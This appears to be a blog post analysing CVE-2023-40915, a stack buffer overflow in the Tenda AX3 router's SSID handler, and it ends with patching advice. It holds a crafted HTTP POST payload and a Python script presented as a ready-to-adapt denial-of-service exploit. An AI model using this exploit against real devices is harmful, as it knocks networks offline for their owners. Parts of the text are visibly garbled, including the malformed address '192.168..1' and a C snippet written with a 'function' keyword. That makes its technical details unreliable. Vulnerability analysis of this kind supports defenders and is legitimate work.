CVE-2023-40915: Analyzing Tenda AX3 Stack Buffer Overflow Vulnerability and Developing an Exploit for Denial of Service (DoS) Attacks

In recent years, cybercriminals have been increasingly targeting routers, as they are the entry point for most network-connected devices. With the discovery of Tenda AX3 router's stack buffer overflow vulnerability in its version 16.03.12.11, we have decided to investigate further and provide an in-depth analysis. In this blog post, we will explore the details of the CVE-2023-40915 vulnerability, including code snippets, links to the original references, and the potential exploit for Denial of Service (DoS) attacks.

Exploit Details

The vulnerability was found in the function form_fast_setting_wifi_set, which processes the router's SSID parameter. A remote attacker with valid credentials can exploit this vulnerability to cause a Denial of Service (DoS) by sending a specifically crafted request with an overly long SSID.

The affected function can be found in the binary file "httpd" responsible for handling HTTP requests.

Here's a code snippet of the affected function

function form_fast_setting_wifi_set()
{
  ...
  char ssid[32];
  ...
  strcpy(ssid, get_cgi("ssid"));
  ...
}

As you can see, the function declares a buffer named 'ssid' with a size of 32 bytes. The input passed as the 'ssid' parameter to the get_cgi function is not checked for its length before being copied to the 'ssid' buffer using strcpy(). This can result in a buffer overflow, which can lead to memory corruption and potentially a DoS attack.

The Vulnerability Report provides more details (see [Original References](#original-references)).

An example HTTP request that demonstrates this vulnerability would look like the one shown below

POST /goform/form_fast_setting_wifi_set HTTP/1.1
Host: 192.168..1
Content-Length: length
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

ssid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In this example, the ssid parameter value contains 40 bytes of data, which exceeds the buffer size (32 bytes). By sending this request, an attacker can overwrite the memory, causing a DoS attack.

To develop an exploit, an attacker can use Python to generate a HTTP POST request with a specially crafted SSID value:

import requests

target_url = "http://192.168..1/goform/form_fast_setting_wifi_set";
ssid_value = "A" * 40  # Change the number to adjust payload size
data = {'ssid': ssid_value}
username = "admin"
password = "password"  # Replace with the router's password

response = requests.post(target_url, data=data, auth=(username, password))

if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Failed to send exploit")

Just replace the target URL, password, and the desired payload size accordingly to fit your needs.

Original References

The vulnerability was initially reported by Clementloualo, who has published a blog post detailing the findings: https://www.clementloualo.com/tenda-ax3-stack-buffer-overflow/

Moreover, the CVE entry for this vulnerability can be found on the CVE List website: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40915

Conclusion

In conclusion, the Tenda AX3 v16.03.12.11's stack buffer overflow vulnerability (CVE-2023-40915) can be exploited by attackers to cause a Denial of Service (DoS) via the router's SSID parameter. Users are advised to upgrade their router's firmware to the latest version and change their device's SSID and password to prevent unauthorized access. Network administrators should ensure that their devices are updated and secure, and employ network monitoring to identify any unusual activity.

Timeline

Published on: 08/25/2023 15:15:09 UTC
Last modified on: 08/29/2023 16:11:13 UTC